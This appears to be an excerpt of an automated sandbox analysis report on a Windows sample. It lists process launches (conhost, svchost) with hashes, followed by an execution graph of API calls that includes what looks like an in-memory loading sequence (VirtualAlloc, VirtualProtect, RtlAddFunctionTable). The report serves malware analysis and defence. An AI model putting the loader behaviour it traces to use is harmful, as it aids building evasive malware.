                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Target ID:26
                                                                                                                          Start time:04:50:13
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7c9170000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Target ID:29
                                                                                                                          Start time:04:50:30
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Target ID:31
                                                                                                                          Start time:04:50:48
                                                                                                                          Start date:14/05/2022
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:9.6%
                                                                                                                            Dynamic/Decrypted Code Coverage:1.6%
                                                                                                                            Signature Coverage:15.8%
                                                                                                                            Total number of Nodes:678
                                                                                                                            Total number of Limit Nodes:6
                                                                                                                            execution_graph 9452 7ffc66d72050 9455 7ffc66d31000 9452->9455 9456 7ffc66d3101e ExitProcess 9455->9456 9457 620000 9458 620183 9457->9458 9459 62043e VirtualAlloc 9458->9459 9463 620462 9459->9463 9460 620a7b 9461 620531 GetNativeSystemInfo 9461->9460 9462 62056d VirtualAlloc 9461->9462 9467 62058b 9462->9467 9463->9460 9463->9461 9464 620a00 9464->9460 9465 620a56 RtlAddFunctionTable 9464->9465 9465->9460 9466 6209d9 VirtualProtect 9466->9467 9467->9464 9467->9466 9468 7ffc66d72290 9471 7ffc66d722b6 9468->9471 9469 7ffc66d722be 9470 7ffc66d722f3 9470->9469 9522 7ffc66d31230 9470->9522 9471->9469 9471->9470 9480 7ffc66d72154 9471->9480 9475 7ffc66d31230 8 API calls 9477 7ffc66d72328 9475->9477 9476 7ffc66d72154 126 API calls 9476->9469 9478 7ffc66d72154 126 API calls 9477->9478 9479 7ffc66d72335 9478->9479 9479->9469 9479->9476 9481 7ffc66d72162 9480->9481 9482 7ffc66d721e1 9480->9482 9527 7ffc66d74110 HeapCreate 9481->9527 9484 7ffc66d7221e 9482->9484 9491 7ffc66d721e5 9482->9491 9485 7ffc66d72223 9484->9485 9486 7ffc66d72279 9484->9486 9620 7ffc66d73108 9485->9620 9488 7ffc66d7216d 9486->9488 9647 7ffc66d72f50 9486->9647 9488->9470 9491->9488 9494 7ffc66d73a48 46 API calls 9491->9494 9493 7ffc66d72179 _RTC_Initialize 9496 7ffc66d7217d 9493->9496 9502 7ffc66d72189 GetCommandLineA 9493->9502 9497 7ffc66d72212 9494->9497 9625 7ffc66d7415c HeapDestroy 9496->9625 9500 7ffc66d72c94 48 API calls 9497->9500 9498 7ffc66d72243 FlsSetValue 9503 7ffc66d7226f 9498->9503 9504 7ffc66d72259 9498->9504 9501 7ffc66d72217 9500->9501 9631 7ffc66d7415c HeapDestroy 9501->9631 9546 7ffc66d73eec 9502->9546 9641 7ffc66d73024 9503->9641 9632 7ffc66d72cbc 9504->9632 9515 7ffc66d721b7 9516 7ffc66d721cb 9515->9516 9599 7ffc66d73aec 9515->9599 9516->9488 9626 7ffc66d73a48 9516->9626 9519 7ffc66d721ab 9584 7ffc66d72c94 9519->9584 9523 7ffc66d31249 wcsftime 9522->9523 9524 7ffc66d31276 9523->9524 9525 7ffc66d720e0 __initmbctable 8 API calls 9524->9525 9526 7ffc66d7203e 9525->9526 9526->9475 9526->9479 9528 7ffc66d72169 9527->9528 9529 7ffc66d74134 HeapSetInformation 9527->9529 9528->9488 9530 7ffc66d72fa0 9528->9530 9529->9528 9653 7ffc66d736f0 9530->9653 9532 7ffc66d72fab 9658 7ffc66d76970 9532->9658 9535 7ffc66d73014 9537 7ffc66d72c94 48 API calls 9535->9537 9536 7ffc66d72fb4 FlsAlloc 9536->9535 9538 7ffc66d72fcc 9536->9538 9539 7ffc66d73019 9537->9539 9540 7ffc66d73108 __wtomb_environ 45 API calls 9538->9540 9539->9493 9541 7ffc66d72fdb 9540->9541 9541->9535 9542 7ffc66d72fe3 FlsSetValue 9541->9542 9542->9535 9543 7ffc66d72ff6 9542->9543 9544 7ffc66d72cbc __doserrno 45 API calls 9543->9544 9545 7ffc66d73000 GetCurrentThreadId 9544->9545 9545->9539 9547 7ffc66d73f4d 9546->9547 9548 7ffc66d73f1b GetEnvironmentStringsW 9546->9548 9549 7ffc66d73f29 9547->9549 9551 7ffc66d74010 9547->9551 9548->9549 9550 7ffc66d73f35 GetLastError 9548->9550 9553 7ffc66d73f70 WideCharToMultiByte 9549->9553 9554 7ffc66d73f5b GetEnvironmentStringsW 9549->9554 9550->9547 9552 7ffc66d7401d GetEnvironmentStrings 9551->9552 9555 7ffc66d7219b 9551->9555 9552->9555 9561 7ffc66d7402f 9552->9561 9557 7ffc66d73fbe 9553->9557 9558 7ffc66d73fff 9553->9558 9554->9553 9554->9555 9571 7ffc66d73758 GetStartupInfoA 9555->9571 9665 7ffc66d7309c 9557->9665 9560 7ffc66d74002 FreeEnvironmentStringsW 9558->9560 9560->9555 9562 7ffc66d7309c __setargv 45 API calls 9561->9562 9564 7ffc66d74053 9562->9564 9565 7ffc66d7405b FreeEnvironmentStringsA 9564->9565 9566 7ffc66d74069 __initmbctable 9564->9566 9565->9555 9569 7ffc66d74077 FreeEnvironmentStringsA 9566->9569 9567 7ffc66d73fce WideCharToMultiByte 9567->9560 9568 7ffc66d73ff7 9567->9568 9570 7ffc66d73024 free 45 API calls 9568->9570 9569->9555 9570->9558 9572 7ffc66d73108 __wtomb_environ 45 API calls 9571->9572 9573 7ffc66d73795 9572->9573 9575 7ffc66d7395b 9573->9575 9576 7ffc66d73108 __wtomb_environ 45 API calls 9573->9576 9582 7ffc66d738c4 9573->9582 9583 7ffc66d721a7 9573->9583 9574 7ffc66d73981 GetStdHandle 9574->9575 9575->9574 9577 7ffc66d739b0 GetFileType 9575->9577 9578 7ffc66d73a10 SetHandleCount 9575->9578 9579 7ffc66d77ee4 _lock InitializeCriticalSectionAndSpinCount 9575->9579 9575->9583 9576->9573 9577->9575 9578->9583 9579->9575 9580 7ffc66d738f7 GetFileType 9580->9582 9581 7ffc66d77ee4 _lock InitializeCriticalSectionAndSpinCount 9581->9582 9582->9575 9582->9580 9582->9581 9582->9583 9583->9519 9592 7ffc66d73df4 9583->9592 9585 7ffc66d72ca3 FlsFree 9584->9585 9586 7ffc66d72cb0 9584->9586 9585->9586 9587 7ffc66d76a2f DeleteCriticalSection 9586->9587 9588 7ffc66d76a4d 9586->9588 9589 7ffc66d73024 free 45 API calls 9587->9589 9590 7ffc66d76a5b DeleteCriticalSection 9588->9590 9591 7ffc66d76a6a 9588->9591 9589->9586 9590->9588 9591->9496 9593 7ffc66d73e11 GetModuleFileNameA 9592->9593 9594 7ffc66d73e0c 9592->9594 9596 7ffc66d73e43 __setargv 9593->9596 9811 7ffc66d74ecc 9594->9811 9597 7ffc66d7309c __setargv 45 API calls 9596->9597 9598 7ffc66d73e97 __setargv 9596->9598 9597->9598 9598->9515 9600 7ffc66d73b09 9599->9600 9604 7ffc66d73b0e __wtomb_environ 9599->9604 9601 7ffc66d74ecc __initmbctable 83 API calls 9600->9601 9601->9604 9602 7ffc66d721c0 9602->9516 9614 7ffc66d7347c 9602->9614 9603 7ffc66d73108 __wtomb_environ 45 API calls 9611 7ffc66d73b4d __wtomb_environ 9603->9611 9604->9602 9604->9603 9605 7ffc66d73bc6 9606 7ffc66d73024 free 45 API calls 9605->9606 9606->9602 9607 7ffc66d73108 __wtomb_environ 45 API calls 9607->9611 9608 7ffc66d73c02 9609 7ffc66d73024 free 45 API calls 9608->9609 9609->9602 9610 7ffc66d77fbc __wtomb_environ 45 API calls 9610->9611 9611->9602 9611->9605 9611->9607 9611->9608 9611->9610 9612 7ffc66d73ba2 9611->9612 9613 7ffc66d76550 __wtomb_environ 6 API calls 9612->9613 9613->9611 9616 7ffc66d73492 _cinit 9614->9616 10215 7ffc66d773f4 9616->10215 9617 7ffc66d734af _initterm_e 9619 7ffc66d734d2 _cinit 9617->9619 10218 7ffc66d773dc 9617->10218 9619->9516 9622 7ffc66d7312d 9620->9622 9623 7ffc66d72237 9622->9623 9624 7ffc66d7314b Sleep 9622->9624 10235 7ffc66d76cec 9622->10235 9623->9488 9623->9498 9624->9622 9624->9623 9625->9488 9630 7ffc66d73a59 9626->9630 9627 7ffc66d73aa8 9627->9519 9628 7ffc66d73024 free 45 API calls 9628->9630 9629 7ffc66d73a70 DeleteCriticalSection 9629->9630 9630->9627 9630->9628 9630->9629 9631->9488 9633 7ffc66d76ba0 _lock 45 API calls 9632->9633 9634 7ffc66d72d11 9633->9634 10244 7ffc66d76a80 LeaveCriticalSection 9634->10244 9642 7ffc66d73029 HeapFree 9641->9642 9646 7ffc66d73059 free 9641->9646 9643 7ffc66d73044 9642->9643 9642->9646 9644 7ffc66d767e0 _errno 43 API calls 9643->9644 9645 7ffc66d73049 GetLastError 9644->9645 9645->9646 9646->9488 9648 7ffc66d72f88 9647->9648 9649 7ffc66d72f64 9647->9649 9648->9488 9650 7ffc66d72f78 FlsSetValue 9649->9650 9651 7ffc66d72f69 FlsGetValue 9649->9651 10245 7ffc66d72e18 9650->10245 9651->9650 9662 7ffc66d72c5c EncodePointer 9653->9662 9655 7ffc66d736fb _initp_misc_winsig 9656 7ffc66d7755c EncodePointer 9655->9656 9657 7ffc66d7373e EncodePointer 9656->9657 9657->9532 9659 7ffc66d76993 9658->9659 9660 7ffc66d72fb0 9659->9660 9663 7ffc66d77ee4 InitializeCriticalSectionAndSpinCount 9659->9663 9660->9535 9660->9536 9664 7ffc66d77f11 9663->9664 9664->9659 9666 7ffc66d730b8 9665->9666 9668 7ffc66d730f0 9666->9668 9669 7ffc66d730d0 Sleep 9666->9669 9670 7ffc66d76c34 9666->9670 9668->9558 9668->9567 9669->9666 9669->9668 9671 7ffc66d76cc8 realloc 9670->9671 9680 7ffc66d76c4c realloc 9670->9680 9674 7ffc66d767e0 _errno 44 API calls 9671->9674 9672 7ffc66d76c84 RtlAllocateHeap 9675 7ffc66d76cbd 9672->9675 9672->9680 9674->9675 9675->9666 9676 7ffc66d76cad 9729 7ffc66d767e0 9676->9729 9679 7ffc66d76cb2 9682 7ffc66d767e0 _errno 44 API calls 9679->9682 9680->9672 9680->9676 9680->9679 9683 7ffc66d76c64 9680->9683 9682->9675 9683->9672 9684 7ffc66d77160 9683->9684 9693 7ffc66d76f0c 9683->9693 9726 7ffc66d7334c 9683->9726 9732 7ffc66d7d2ac 9684->9732 9687 7ffc66d7717d 9689 7ffc66d76f0c _FF_MSGBANNER 45 API calls 9687->9689 9692 7ffc66d7719e 9687->9692 9688 7ffc66d7d2ac _FF_MSGBANNER 45 API calls 9688->9687 9690 7ffc66d77194 9689->9690 9691 7ffc66d76f0c _FF_MSGBANNER 45 API calls 9690->9691 9691->9692 9692->9683 9694 7ffc66d76f2f 9693->9694 9695 7ffc66d7d2ac _FF_MSGBANNER 42 API calls 9694->9695 9725 7ffc66d770d4 9694->9725 9696 7ffc66d76f51 9695->9696 9697 7ffc66d770d6 GetStdHandle 9696->9697 9698 7ffc66d7d2ac _FF_MSGBANNER 42 API calls 9696->9698 9701 7ffc66d770e9 __wtomb_environ 9697->9701 9697->9725 9699 7ffc66d76f64 9698->9699 9699->9697 9700 7ffc66d76f75 9699->9700 9700->9725 9751 7ffc66d77fbc 9700->9751 9702 7ffc66d770ff WriteFile 9701->9702 9701->9725 9702->9725 9705 7ffc66d76fb9 GetModuleFileNameA 9707 7ffc66d76fd9 9705->9707 9710 7ffc66d7700a __wtomb_environ 9705->9710 9706 7ffc66d76550 __wtomb_environ 6 API calls 9706->9705 9708 7ffc66d77fbc __wtomb_environ 42 API calls 9707->9708 9709 7ffc66d76ff1 9708->9709 9709->9710 9713 7ffc66d76550 __wtomb_environ 6 API calls 9709->9713 9711 7ffc66d77065 9710->9711 9760 7ffc66d7bf14 9710->9760 9769 7ffc66d7bdf4 9711->9769 9713->9710 9716 7ffc66d77090 9719 7ffc66d7bdf4 _FF_MSGBANNER 42 API calls 9716->9719 9718 7ffc66d76550 __wtomb_environ 6 API calls 9718->9716 9720 7ffc66d770a6 9719->9720 9722 7ffc66d770bf 9720->9722 9723 7ffc66d76550 __wtomb_environ 6 API calls 9720->9723 9721 7ffc66d76550 __wtomb_environ 6 API calls 9721->9711 9778 7ffc66d7d0b8 9722->9778 9723->9722 9725->9683 9796 7ffc66d73310 GetModuleHandleW 9726->9796 9799 7ffc66d72d70 GetLastError FlsGetValue 9729->9799 9731 7ffc66d767e9 9731->9679 9733 7ffc66d7d2b4 9732->9733 9734 7ffc66d767e0 _errno 45 API calls 9733->9734 9735 7ffc66d7716e 9733->9735 9736 7ffc66d7d2d9 9734->9736 9735->9687 9735->9688 9738 7ffc66d766d8 DecodePointer 9736->9738 9739 7ffc66d76709 9738->9739 9740 7ffc66d76723 _invalid_parameter_noinfo 9738->9740 9739->9735 9742 7ffc66d76550 9740->9742 9749 7ffc66d787a0 9742->9749 9745 7ffc66d7660d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9747 7ffc66d7664c _invalid_parameter_noinfo 9745->9747 9748 7ffc66d76658 GetCurrentProcess TerminateProcess 9745->9748 9746 7ffc66d765ad 9746->9745 9747->9748 9748->9739 9750 7ffc66d76570 RtlCaptureContext 9749->9750 9750->9746 9752 7ffc66d77fd1 9751->9752 9754 7ffc66d77fc7 9751->9754 9753 7ffc66d767e0 _errno 45 API calls 9752->9753 9755 7ffc66d77fd9 9753->9755 9754->9752 9758 7ffc66d77ffd 9754->9758 9756 7ffc66d766d8 _invalid_parameter_noinfo 7 API calls 9755->9756 9757 7ffc66d76fa0 9756->9757 9757->9705 9757->9706 9758->9757 9759 7ffc66d767e0 _errno 45 API calls 9758->9759 9759->9755 9764 7ffc66d7bf22 9760->9764 9761 7ffc66d7bf27 9762 7ffc66d7704c 9761->9762 9763 7ffc66d767e0 _errno 45 API calls 9761->9763 9762->9711 9762->9721 9765 7ffc66d7bf51 9763->9765 9764->9761 9764->9762 9767 7ffc66d7bf75 9764->9767 9766 7ffc66d766d8 _invalid_parameter_noinfo 7 API calls 9765->9766 9766->9762 9767->9762 9768 7ffc66d767e0 _errno 45 API calls 9767->9768 9768->9765 9770 7ffc66d7be0c 9769->9770 9773 7ffc66d7be02 9769->9773 9771 7ffc66d767e0 _errno 45 API calls 9770->9771 9772 7ffc66d7be14 9771->9772 9775 7ffc66d766d8 _invalid_parameter_noinfo 7 API calls 9772->9775 9773->9770 9774 7ffc66d7be50 9773->9774 9776 7ffc66d77077 9774->9776 9777 7ffc66d767e0 _errno 45 API calls 9774->9777 9775->9776 9776->9716 9776->9718 9777->9772 9795 7ffc66d72c5c EncodePointer 9778->9795 9797 7ffc66d7333f ExitProcess 9796->9797 9798 7ffc66d7332a GetProcAddress 9796->9798 9798->9797 9800 7ffc66d72dde SetLastError 9799->9800 9801 7ffc66d72d96 9799->9801 9800->9731 9802 7ffc66d73108 __wtomb_environ 40 API calls 9801->9802 9803 7ffc66d72da3 9802->9803 9803->9800 9804 7ffc66d72dab FlsSetValue 9803->9804 9805 7ffc66d72dc1 9804->9805 9806 7ffc66d72dd7 9804->9806 9808 7ffc66d72cbc __doserrno 40 API calls 9805->9808 9807 7ffc66d73024 free 40 API calls 9806->9807 9810 7ffc66d72ddc 9807->9810 9809 7ffc66d72dc8 GetCurrentThreadId 9808->9809 9809->9800 9810->9800 9812 7ffc66d74ee3 9811->9812 9813 7ffc66d74ed9 9811->9813 9812->9593 9815 7ffc66d74cd4 9813->9815 9839 7ffc66d72df4 9815->9839 9822 7ffc66d74e81 9822->9812 9823 7ffc66d7309c __setargv 45 API calls 9824 7ffc66d74d24 __initmbctable 9823->9824 9824->9822 9862 7ffc66d74a0c 9824->9862 9827 7ffc66d74e83 9827->9822 9829 7ffc66d74e9c 9827->9829 9830 7ffc66d73024 free 45 API calls 9827->9830 9828 7ffc66d74d5f 9832 7ffc66d73024 free 45 API calls 9828->9832 9833 7ffc66d74d84 9828->9833 9831 7ffc66d767e0 _errno 45 API calls 9829->9831 9830->9829 9831->9822 9832->9833 9833->9822 9872 7ffc66d76ba0 9833->9872 9840 7ffc66d72d70 __doserrno 45 API calls 9839->9840 9842 7ffc66d72dff 9840->9842 9841 7ffc66d72e0f 9844 7ffc66d748c0 9841->9844 9842->9841 9878 7ffc66d732e0 9842->9878 9845 7ffc66d72df4 _getptd 45 API calls 9844->9845 9846 7ffc66d748cf 9845->9846 9847 7ffc66d748ea 9846->9847 9848 7ffc66d76ba0 _lock 45 API calls 9846->9848 9849 7ffc66d7496e 9847->9849 9852 7ffc66d732e0 _getptd 45 API calls 9847->9852 9853 7ffc66d748fd 9848->9853 9855 7ffc66d7497c 9849->9855 9850 7ffc66d74934 9883 7ffc66d76a80 LeaveCriticalSection 9850->9883 9852->9849 9853->9850 9854 7ffc66d73024 free 45 API calls 9853->9854 9854->9850 9884 7ffc66d72534 9855->9884 9858 7ffc66d749c1 9860 7ffc66d749c6 GetACP 9858->9860 9861 7ffc66d749ac 9858->9861 9859 7ffc66d7499c GetOEMCP 9859->9861 9860->9861 9861->9822 9861->9823 9863 7ffc66d7497c __initmbctable 47 API calls 9862->9863 9864 7ffc66d74a33 9863->9864 9865 7ffc66d74a3b __initmbctable 9864->9865 9866 7ffc66d74a8c IsValidCodePage 9864->9866 9871 7ffc66d74ab2 __wtomb_environ 9864->9871 10061 7ffc66d720e0 9865->10061 9866->9865 9868 7ffc66d74a9d GetCPInfo 9866->9868 9868->9865 9868->9871 9869 7ffc66d74c6f 9869->9827 9869->9828 10051 7ffc66d746dc GetCPInfo 9871->10051 9873 7ffc66d76bbe 9872->9873 9874 7ffc66d76bcf EnterCriticalSection 9872->9874 10189 7ffc66d76ab8 9873->10189 9877 7ffc66d732e0 _getptd 44 API calls 9877->9874 9879 7ffc66d77160 _FF_MSGBANNER 44 API calls 9878->9879 9880 7ffc66d732ed 9879->9880 9881 7ffc66d76f0c _FF_MSGBANNER 44 API calls 9880->9881 9882 7ffc66d732f4 DecodePointer 9881->9882 9885 7ffc66d7254a 9884->9885 9891 7ffc66d725ae 9884->9891 9886 7ffc66d72df4 _getptd 45 API calls 9885->9886 9887 7ffc66d7254f 9886->9887 9888 7ffc66d72587 9887->9888 9892 7ffc66d7524c 9887->9892 9890 7ffc66d748c0 __initmbctable 45 API calls 9888->9890 9888->9891 9890->9891 9891->9858 9891->9859 9893 7ffc66d72df4 _getptd 45 API calls 9892->9893 9894 7ffc66d75257 9893->9894 9895 7ffc66d75280 9894->9895 9896 7ffc66d75272 9894->9896 9897 7ffc66d76ba0 _lock 45 API calls 9895->9897 9898 7ffc66d72df4 _getptd 45 API calls 9896->9898 9899 7ffc66d7528a 9897->9899 9900 7ffc66d75277 9898->9900 9906 7ffc66d751f4 9899->9906 9903 7ffc66d752b8 9900->9903 9905 7ffc66d732e0 _getptd 45 API calls 9900->9905 9903->9888 9905->9903 9907 7ffc66d7523e 9906->9907 9908 7ffc66d75202 __doserrno ___lc_collate_cp_func 9906->9908 9910 7ffc66d76a80 LeaveCriticalSection 9907->9910 9908->9907 9911 7ffc66d74f04 9908->9911 9912 7ffc66d74f9b 9911->9912 9914 7ffc66d74f22 9911->9914 9913 7ffc66d74fee 9912->9913 9915 7ffc66d73024 free 45 API calls 9912->9915 9931 7ffc66d7501b 9913->9931 9963 7ffc66d798a4 9913->9963 9914->9912 9916 7ffc66d74f61 9914->9916 9922 7ffc66d73024 free 45 API calls 9914->9922 9917 7ffc66d74fbf 9915->9917 9920 7ffc66d74f83 9916->9920 9930 7ffc66d73024 free 45 API calls 9916->9930 9919 7ffc66d73024 free 45 API calls 9917->9919 9923 7ffc66d74fd3 9919->9923 9925 7ffc66d73024 free 45 API calls 9920->9925 9927 7ffc66d74f55 9922->9927 9929 7ffc66d73024 free 45 API calls 9923->9929 9924 7ffc66d75067 9932 7ffc66d74f8f 9925->9932 9926 7ffc66d73024 free 45 API calls 9926->9931 9939 7ffc66d79df8 9927->9939 9928 7ffc66d73024 45 API calls free 9928->9931 9934 7ffc66d74fe2 9929->9934 9935 7ffc66d74f77 9930->9935 9931->9924 9931->9928 9936 7ffc66d73024 free 45 API calls 9932->9936 9937 7ffc66d73024 free 45 API calls 9934->9937 9955 7ffc66d79b68 9935->9955 9936->9912 9937->9913 9940 7ffc66d79e01 9939->9940 9953 7ffc66d79e87 9939->9953 9941 7ffc66d79e1b 9940->9941 9942 7ffc66d73024 free 45 API calls 9940->9942 9943 7ffc66d79e2d 9941->9943 9944 7ffc66d73024 free 45 API calls 9941->9944 9942->9941 9945 7ffc66d79e3f 9943->9945 9946 7ffc66d73024 free 45 API calls 9943->9946 9944->9943 9947 7ffc66d79e51 9945->9947 9948 7ffc66d73024 free 45 API calls 9945->9948 9946->9945 9949 7ffc66d73024 free 45 API calls 9947->9949 9950 7ffc66d79e63 9947->9950 9948->9947 9949->9950 9951 7ffc66d79e75 9950->9951 9952 7ffc66d73024 free 45 API calls 9950->9952 9951->9953 9954 7ffc66d73024 free 45 API calls 9951->9954 9952->9951 9953->9916 9954->9953 9956 7ffc66d79baa 9955->9956 9957 7ffc66d79b6d 9955->9957 9956->9920 9958 7ffc66d79b86 9957->9958 9960 7ffc66d73024 free 45 API calls 9957->9960 9959 7ffc66d79b98 9958->9959 9961 7ffc66d73024 free 45 API calls 9958->9961 9959->9956 9962 7ffc66d73024 free 45 API calls 9959->9962 9960->9958 9961->9959 9962->9956 9964 7ffc66d7500f 9963->9964 9965 7ffc66d798ad 9963->9965 9964->9926 9966 7ffc66d73024 free 45 API calls 9965->9966 9967 7ffc66d798be 9966->9967 9968 7ffc66d73024 free 45 API calls 9967->9968 9969 7ffc66d798c7 9968->9969 9970 7ffc66d73024 free 45 API calls 9969->9970 9971 7ffc66d798d0 9970->9971 9972 7ffc66d73024 free 45 API calls 9971->9972 9973 7ffc66d798d9 9972->9973 9974 7ffc66d73024 free 45 API calls 9973->9974 9975 7ffc66d798e2 9974->9975 9976 7ffc66d73024 free 45 API calls 9975->9976 9977 7ffc66d798eb 9976->9977 9978 7ffc66d73024 free 45 API calls 9977->9978 9979 7ffc66d798f3 9978->9979 9980 7ffc66d73024 free 45 API calls 9979->9980 9981 7ffc66d798fc 9980->9981 9982 7ffc66d73024 free 45 API calls 9981->9982 9983 7ffc66d79905 9982->9983 9984 7ffc66d73024 free 45 API calls 9983->9984 9985 7ffc66d7990e 9984->9985 9986 7ffc66d73024 free 45 API calls 9985->9986 9987 7ffc66d79917 9986->9987 9988 7ffc66d73024 free 45 API calls 9987->9988 9989 7ffc66d79920 9988->9989 9990 7ffc66d73024 free 45 API calls 9989->9990 9991 7ffc66d79929 9990->9991 9992 7ffc66d73024 free 45 API calls 9991->9992 9993 7ffc66d79932 9992->9993 9994 7ffc66d73024 free 45 API calls 9993->9994 9995 7ffc66d7993b 9994->9995 9996 7ffc66d73024 free 45 API calls 9995->9996 9997 7ffc66d79944 9996->9997 9998 7ffc66d73024 free 45 API calls 9997->9998 9999 7ffc66d79950 9998->9999 10000 7ffc66d73024 free 45 API calls 9999->10000 10001 7ffc66d7995c 10000->10001 10002 7ffc66d73024 free 45 API calls 10001->10002 10003 7ffc66d79968 10002->10003 10004 7ffc66d73024 free 45 API calls 10003->10004 10005 7ffc66d79974 10004->10005 10006 7ffc66d73024 free 45 API calls 10005->10006 10007 7ffc66d79980 10006->10007 10008 7ffc66d73024 free 45 API calls 10007->10008 10009 7ffc66d7998c 10008->10009 10010 7ffc66d73024 free 45 API calls 10009->10010 10011 7ffc66d79998 10010->10011 10012 7ffc66d73024 free 45 API calls 10011->10012 10013 7ffc66d799a4 10012->10013 10014 7ffc66d73024 free 45 API calls 10013->10014 10015 7ffc66d799b0 10014->10015 10016 7ffc66d73024 free 45 API calls 10015->10016 10017 7ffc66d799bc 10016->10017 10018 7ffc66d73024 free 45 API calls 10017->10018 10019 7ffc66d799c8 10018->10019 10020 7ffc66d73024 free 45 API calls 10019->10020 10021 7ffc66d799d4 10020->10021 10022 7ffc66d73024 free 45 API calls 10021->10022 10023 7ffc66d799e0 10022->10023 10024 7ffc66d73024 free 45 API calls 10023->10024 10025 7ffc66d799ec 10024->10025 10026 7ffc66d73024 free 45 API calls 10025->10026 10027 7ffc66d799f8 10026->10027 10028 7ffc66d73024 free 45 API calls 10027->10028 10029 7ffc66d79a04 10028->10029 10030 7ffc66d73024 free 45 API calls 10029->10030 10031 7ffc66d79a10 10030->10031 10032 7ffc66d73024 free 45 API calls 10031->10032 10033 7ffc66d79a1c 10032->10033 10034 7ffc66d73024 free 45 API calls 10033->10034 10035 7ffc66d79a28 10034->10035 10036 7ffc66d73024 free 45 API calls 10035->10036 10037 7ffc66d79a34 10036->10037 10038 7ffc66d73024 free 45 API calls 10037->10038 10039 7ffc66d79a40 10038->10039 10040 7ffc66d73024 free 45 API calls 10039->10040 10041 7ffc66d79a4c 10040->10041 10042 7ffc66d73024 free 45 API calls 10041->10042 10043 7ffc66d79a58 10042->10043 10044 7ffc66d73024 free 45 API calls 10043->10044 10045 7ffc66d79a64 10044->10045 10046 7ffc66d73024 free 45 API calls 10045->10046 10047 7ffc66d79a70 10046->10047 10048 7ffc66d73024 free 45 API calls 10047->10048 10049 7ffc66d79a7c 10048->10049 10050 7ffc66d73024 free 45 API calls 10049->10050 10050->9964 10052 7ffc66d7471e __wtomb_environ 10051->10052 10053 7ffc66d7480a 10051->10053 10072 7ffc66d791a0 10052->10072 10056 7ffc66d720e0 __initmbctable 8 API calls 10053->10056 10058 7ffc66d748aa 10056->10058 10058->9865 10060 7ffc66d78e9c __initmbctable 78 API calls 10060->10053 10062 7ffc66d720e9 10061->10062 10063 7ffc66d720f4 10062->10063 10064 7ffc66d723e8 RtlCaptureContext RtlLookupFunctionEntry 10062->10064 10063->9869 10065 7ffc66d7242c RtlVirtualUnwind 10064->10065 10066 7ffc66d7246d 10064->10066 10067 7ffc66d7248f IsDebuggerPresent 10065->10067 10066->10067 10188 7ffc66d7460c 10067->10188 10069 7ffc66d724ee SetUnhandledExceptionFilter UnhandledExceptionFilter 10070 7ffc66d7250c _invalid_parameter_noinfo 10069->10070 10071 7ffc66d72516 GetCurrentProcess TerminateProcess 10069->10071 10070->10071 10071->9869 10073 7ffc66d72534 wcsftime 45 API calls 10072->10073 10074 7ffc66d791c4 10073->10074 10082 7ffc66d78f34 10074->10082 10077 7ffc66d78e9c 10078 7ffc66d72534 wcsftime 45 API calls 10077->10078 10079 7ffc66d78ec0 10078->10079 10141 7ffc66d7895c 10079->10141 10083 7ffc66d78fc1 10082->10083 10084 7ffc66d78f84 GetStringTypeW 10082->10084 10085 7ffc66d78f9e 10083->10085 10087 7ffc66d790f0 10083->10087 10084->10085 10086 7ffc66d78fa6 GetLastError 10084->10086 10088 7ffc66d78fea MultiByteToWideChar 10085->10088 10096 7ffc66d790e9 10085->10096 10086->10083 10106 7ffc66d7e1e8 GetLocaleInfoA 10087->10106 10090 7ffc66d79018 10088->10090 10088->10096 10097 7ffc66d76c34 realloc 45 API calls 10090->10097 10102 7ffc66d7903d __wtomb_environ wcsftime 10090->10102 10091 7ffc66d720e0 __initmbctable 8 API calls 10093 7ffc66d747a1 10091->10093 10093->10077 10094 7ffc66d7914b GetStringTypeA 10095 7ffc66d7916e 10094->10095 10094->10096 10099 7ffc66d73024 free 45 API calls 10095->10099 10096->10091 10097->10102 10099->10096 10100 7ffc66d790a4 MultiByteToWideChar 10103 7ffc66d790db 10100->10103 10104 7ffc66d790c6 GetStringTypeW 10100->10104 10102->10096 10102->10100 10103->10096 10105 7ffc66d73024 free 45 API calls 10103->10105 10104->10103 10105->10096 10107 7ffc66d7e21f 10106->10107 10108 7ffc66d7e21a 10106->10108 10137 7ffc66d72100 10107->10137 10110 7ffc66d720e0 __initmbctable 8 API calls 10108->10110 10111 7ffc66d7911a 10110->10111 10111->10094 10111->10096 10112 7ffc66d7e23c 10111->10112 10113 7ffc66d7e366 10112->10113 10114 7ffc66d7e28e GetCPInfo 10112->10114 10117 7ffc66d720e0 __initmbctable 8 API calls 10113->10117 10115 7ffc66d7e2a0 10114->10115 10116 7ffc66d7e33f MultiByteToWideChar 10114->10116 10115->10116 10118 7ffc66d7e2aa GetCPInfo 10115->10118 10116->10113 10121 7ffc66d7e2c5 __wtomb_environ 10116->10121 10119 7ffc66d79140 10117->10119 10118->10116 10120 7ffc66d7e2bf 10118->10120 10119->10094 10119->10096 10120->10116 10120->10121 10122 7ffc66d76c34 realloc 45 API calls 10121->10122 10124 7ffc66d7e301 __wtomb_environ wcsftime 